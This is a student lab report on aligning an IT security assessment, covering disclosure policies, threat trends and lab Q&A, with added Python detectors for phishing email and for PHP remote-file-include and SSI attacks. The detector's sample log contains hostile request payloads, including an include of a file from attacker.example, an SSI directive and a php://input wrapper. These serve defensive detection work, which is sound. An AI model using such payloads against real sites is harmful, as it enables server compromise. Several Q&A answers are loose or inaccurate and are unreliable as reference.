Lab 1 Of Aligning An IT Security Assessment - CBU Security Compliance - Lab

Juan Carlos
Dr. Marshall
Security Compliance
Lab 4: Aligning an IT Security Assessment
Vulnerability Life Cycle
· Death is the final stage of the vulnerability life cycle. It is reached when the number of systems vulnerable to an exploit drops to an insignificant level, whether through patching vulnerable systems, retiring old systems, or attackers losing interest in the exploit.
Types of Disclosure
· The types of disclosure are listed below
· This policy means keeping the information tightly contained so that the general public never learns of its existence.
Full Disclosure
· Under full disclosure, information about system vulnerabilities and attack tools is revealed as fully as possible so that potential victims are as knowledgeable as those who attack them.
Limited Disclosure
· The main concept behind limited disclosure is that vulnerability information is shared with as few individuals as possible.
Responsible Disclosure
· During this stage of the vulnerability life cycle, the method of discovery determines how responsible disclosure proceeds. Initial contact signals the start of the disclosure stage.
Existing Policies and Proposals
· NTBugtraq disclosure policy
· Rain Forest Puppy's RFPolicy
· IETF draft
· The Fisher Plan
Threat Activity Trends
· Organizations should monitor all network-connected computers for signs of malicious activity, including bot activity and potential security breaches, ensuring that any infected computers are removed from the network and disinfected as soon as possible.
Vulnerability Trends
· Web browser vulnerabilities are a serious security concern due to their role in online fraud and in the propagation of malicious code, spyware, and adware.
Malicious Code Trends
· Monitoring trends in the number of new malicious threats can help improve awareness of their danger and underscores the importance of maintaining robust security, including up-to-date antivirus signatures and software patches.
Phishing, Underground Economy Servers, Spam Trends
· Symantec recommends that enterprise users protect themselves against phishing threats by filtering email at the server level through the mail transfer agent. Organizations can also use IP-based filtering upstream as well as HTTP filtering.
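The MTA-level filtering recommended above can be illustrated with a few header and link checks. The following is an added example written for this page, not code from the lab or from Symantec; the two sample messages, every domain and header value in them, and the three checks themselves (a Reply-To domain that differs from the visible sender, SPF/DKIM/DMARC failures recorded in the receiving server's own Authentication-Results header, and anchor text that names a different host than its href) are assumptions about what a first-pass server-side filter would look for.

```python
"""Phishing triage checks at the mail transfer agent.

Added example, not part of the lab report or of Symantec's guidance: three
header/body checks an MTA-level filter can apply before a message reaches a
mailbox.  Standard library only.  Both sample messages and every domain in
them are constructed for this example.
"""
import email
import re
from email import policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample 1: a credential-phishing message.
PHISH_RAW = """\
From: "Payroll Department" <payroll@example-corp.com>
Reply-To: collect@mailbox-example.net
To: employee@example-corp.com
Subject: Action required: confirm your direct deposit
Authentication-Results: mx.example-corp.com; spf=fail smtp.mailfrom=example-corp.com; dkim=none
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Your payroll profile needs verification within 24 hours.</p>
<p><a href="http://login-portal-example.net/verify">https://hr.example-corp.com/login</a></p>
</body></html>
"""

# Constructed sample 2: a legitimate internal notice.
CLEAN_RAW = """\
From: "Payroll Department" <payroll@example-corp.com>
To: employee@example-corp.com
Subject: Pay stubs for March are available
Authentication-Results: mx.example-corp.com; spf=pass smtp.mailfrom=example-corp.com; dkim=pass
Content-Type: text/html; charset="utf-8"

<html><body>
<p>March pay stubs are posted at <a href="https://hr.example-corp.com/paystubs">hr.example-corp.com</a>.</p>
</body></html>
"""

HREF_RE = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)
AUTH_FAIL_RE = re.compile(r'\b(spf|dkim|dmarc)=(fail|softfail|permerror)\b', re.I)
TAG_RE = re.compile(r'<[^>]+>')


def _domain(header_value):
    """Domain part of the address in a From/Reply-To header, lower-cased."""
    return parseaddr(str(header_value))[1].rpartition('@')[2].lower()


def _hostname(text):
    """Hostname of a URL or bare domain in anchor text; '' if it is neither."""
    candidate = text if '://' in text else 'http://' + text
    host = (urlparse(candidate).hostname or '').lower()
    return host if '.' in host and ' ' not in text else ''


def phishing_findings(raw):
    """Return (check, detail) pairs for one RFC 5322 message; [] when clean."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []

    # 1. Reply-To pointing at a different domain than the visible sender.
    from_domain = _domain(msg.get('From', ''))
    reply_domain = _domain(msg.get('Reply-To', ''))
    if reply_domain and reply_domain != from_domain:
        findings.append(('reply-to-mismatch', f'{from_domain} -> {reply_domain}'))

    # 2. SPF/DKIM/DMARC failures recorded by our own MTA.
    for hdr in msg.get_all('Authentication-Results', []):
        for mech, result in AUTH_FAIL_RE.findall(str(hdr)):
            findings.append((f'auth-{mech.lower()}-{result.lower()}', str(hdr).strip()))

    # 3. Links whose visible text names one host but whose href goes elsewhere.
    body = msg.get_body(preferencelist=('html', 'plain'))
    html = body.get_content() if body is not None else ''
    for href, inner in HREF_RE.findall(html):
        visible_host = _hostname(TAG_RE.sub('', inner).strip())
        href_host = (urlparse(href).hostname or '').lower()
        if visible_host and visible_host != href_host:
            findings.append(('link-text-mismatch', f'{visible_host} -> {href_host}'))
    return findings


def verdict(raw):
    """Filter decision: 'quarantine' on two or more findings, 'flag' on one."""
    n = len(phishing_findings(raw))
    return 'quarantine' if n >= 2 else 'flag' if n == 1 else 'deliver'


if __name__ == '__main__':
    for label, raw in (('phish', PHISH_RAW), ('clean', CLEAN_RAW)):
        print(label, verdict(raw), phishing_findings(raw))
```

Run stand-alone, the script quarantines the first sample on all three findings and delivers the second. The thresholds in verdict are a placeholder policy; a real deployment would weight an authentication failure from its own MTA more heavily than a Reply-To mismatch, since legitimate ticketing and newsletter systems routinely set a different Reply-To.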
There is a long list of reasons why you want to do periodic assessments and an equally long list of reasons why you shouldn't. An increasing number of organizations are bound by governmental regulations that dictate what security measures you should have in place and how they should be audited. You get to find out whether your security has already been compromised. You might not know unless you look, and you will sleep better at night if you know.
Lab Assessment Questions and Answers
1. What is a PHP Remote File Include attack and why are these prevalent in today's Internet world? A file-inclusion attack in which an attacker causes the web application to include a remote file, by exploiting an application that dynamically includes external files or scripts.
2. What country is at the top for Structured Query Language injection and SQL Slammer infections? The U.S. Why can't the U.S. government do anything to prevent these injection attacks and infections? Cybercriminals have made vast improvements to their infrastructure over the last few years, and that expansion has left thousands of websites vulnerable to SQL injection.
3. What does it mean to have a policy of nondisclosure in an organization? It is a contract in which the parties agree not to disclose information covered by the agreement.
4. What trends were tracked when it came to malicious code in 2009 by the Symantec Report researched during this lab? DoS attacks are always common; however, the targeted attacks using advanced persistent threats that occurred in 2009 made headlines.
5. What is phishing? Describe what a typical phishing attack attempts to accomplish. Phishing is a term used to describe various scams that use fraudulent email messages sent by criminals to trick you into divulging personal information.
6. What is the Zero Day Initiative? A program for rewarding security researchers for responsibly disclosing vulnerabilities. Do you think this is valuable and would you participate if you were the managing partner in a large firm? It is valuable for firms in that vulnerabilities are shared so that they can be mitigated before more harm can be done.
7. What is a Server Side Include? What are the ramifications if an SSI exploit is successful? A Server Side Includes attack exploits a web application by injecting scripts into HTML pages or executing arbitrary code remotely. It can be carried out by manipulating SSI already in use in the application or by forcing its use through user input fields.
8. According to the TippingPoint Report researched in the lab, how do Server Message Block attacks measure up to Hypertext Transfer Protocol attacks in the recent past? In contrast to HTTP attacks, attacks against the SMB protocol, which is the foundation of countless file shares, have dropped over the sampled time period.
9. According to the TippingPoint Report what are some of the PHP RFI payload effects DVLabs has detected? Password brute force, E-mail/MMS Spam relay, Network flood, Malware dropper, Botnet member, Recon and re-infection.
10. Explain the steps it takes to execute a malicious PDF attack as described in the TippingPoint report. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
11. What is a Zero Day attack and how does this relate to an organization’s vulnerability window? It’s an attack that exploits a previously unknown vulnerability in a computer application, one that developers have not had time to address and patch.
12. How can you mitigate the risk from users and employees clicking on an embedded URL link or email attachment from unknown sources? Continue with the controls that the government organization already has in place to combat malicious e-mail. Connect to the Internet via a Trusted Internet Connection. Take measures to protect the actual PCs used by users.
13. When auditing an organization for compliance, what role do IT security policies and an IT security policy framework play in the compliance audit? Since IT systems are used to generate, change, house, and transport the data, IT personnel have to build the controls that ensure the information stands up to audit scrutiny.
14. When performing a security assessment why is it a good idea to examine compliance in separate compartments such as the seven domains of a typical IT infrastructure? Each domain has different degrees of risk that require different mitigation solutions. Each domain will have different standards to meet compliance requirements.
15. True or False: Auditing for compliance and performing security assessments to achieve compliance require a checklist of compliance requirements. True.
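Questions 1 and 7 describe PHP remote file inclusion and SSI injection. The detector below is an added example written for this page, not code from the lab or from the TippingPoint report: it scans combined-format web access log lines and reports request parameters carrying the indicators of both. The log lines, IP addresses and hostnames are constructed, and the indicator lists (remote URL schemes, the php:// and data: stream wrappers, and an SSI directive opener in user input) are assumptions about what a first-pass rule would cover.

```python
"""Flag PHP remote-file-include and server-side-include attempts in web logs.

Added example, not from the lab report or the TippingPoint report: reads
Apache/nginx combined-format access log lines and reports request
parameters carrying RFI or SSI indicators.  Standard library only; the log
lines and every host and address in them are constructed for this example.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample log (combined format).  Lines 1, 2 and 4 carry
# indicators; line 3 is an ordinary page request.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2009:13:55:36 +0000] "GET /index.php?page=http://attacker.example/inc.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2009:13:56:01 +0000] "GET /guestbook.cgi?name=%3C%21--%23echo%20var%3D%22DATE_LOCAL%22%20--%3E HTTP/1.1" 200 310 "-" "curl/7.19"
192.0.2.9 - - [10/Mar/2009:13:56:40 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Mar/2009:13:57:12 +0000] "GET /index.php?page=php://input HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
REMOTE_SCHEMES = ('http://', 'https://', 'ftp://')   # classic RFI: include of a remote file
STREAM_WRAPPERS = ('php://', 'data:')                # PHP stream wrappers an include() may open
SSI_RE = re.compile(r'<!--\s*#\s*[a-z]+', re.I)      # any SSI directive arriving in user input


def classify_value(value):
    """Category for one decoded parameter value, or None if it looks benign."""
    v = unquote(value).strip().lower()   # second decode catches double-encoded values
    if v.startswith(REMOTE_SCHEMES):
        return 'rfi-remote-url'
    if v.startswith(STREAM_WRAPPERS):
        return 'rfi-stream-wrapper'
    if SSI_RE.search(v):
        return 'ssi-directive'
    return None


def scan_log(text):
    """Return one finding dict per suspicious parameter across all log lines."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue          # malformed line: skip it rather than abort the scan
        parts = urlsplit(m.group('target'))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            category = classify_value(value)
            if category:
                findings.append({
                    'line': line_no, 'ip': m.group('ip'), 'path': parts.path,
                    'param': name, 'category': category,
                    'status': int(m.group('status')),
                })
    return findings


def sources_by_category(findings):
    """Map category -> sorted list of client IPs, for a quick triage view."""
    out = {}
    for f in findings:
        out.setdefault(f['category'], set()).add(f['ip'])
    return {k: sorted(v) for k, v in out.items()}


if __name__ == '__main__':
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f)
    print(sources_by_category(hits))
```

Run stand-alone, it prints one finding per suspicious parameter and the client addresses per category; a 200 status on an RFI hit is worth a closer look, since a hardened application would reject the request. On the mitigation side, an include target should be matched against an allowlist of local page names rather than used directly, and PHP's allow_url_include setting should stay off; for SSI, user input should never be emitted into a page the server parses for directives, and where SSI must remain enabled Apache's Options IncludesNOEXEC removes the exec directive.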
